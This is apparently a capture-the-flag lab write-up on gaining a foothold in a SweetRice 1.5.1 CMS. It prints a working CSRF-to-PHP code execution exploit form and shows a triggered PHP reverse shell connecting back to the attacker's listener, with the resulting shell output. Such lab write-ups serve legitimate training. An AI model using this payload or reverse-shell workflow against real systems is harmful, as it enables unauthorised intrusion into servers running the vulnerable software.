InfoSec LAB

LazyAdmin_Exploitation

Created: 2 min read

PHP Remote Code Execution

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ searchsploit -m php/webapps/40700.html
  Exploit: SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
      URL: https://www.exploit-db.com/exploits/40700
     Path: /usr/share/exploitdb/exploits/php/webapps/40700.html
    Codes: N/A
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/archive/thm/lazyadmin/40700.html

Copying the exploit package to the current working directory

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ cat 40700.html          
<!--
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30-11-2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
 
 
# Description :
 
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
Code You Can
Customize Exploit For Your Self .
 
# Exploit :
-->
 
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>
 
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
  -->

It would appear that I can get code execution through the Ads section

Creating an ads, that contains the PHP reverse shell

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ curl http://$IP/content/inc/ads/revshell.php

Triggering the PHP reverse shell

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.187.138] 32872
SOCKET: Shell has connected! PID: 2618
whoami
www-data
hostname
THM-Chal
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::57:61ff:fe3f:5de9/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via exploiting the ads feature in SweetRice 1.5.1

Interactive Graph View

Backlinks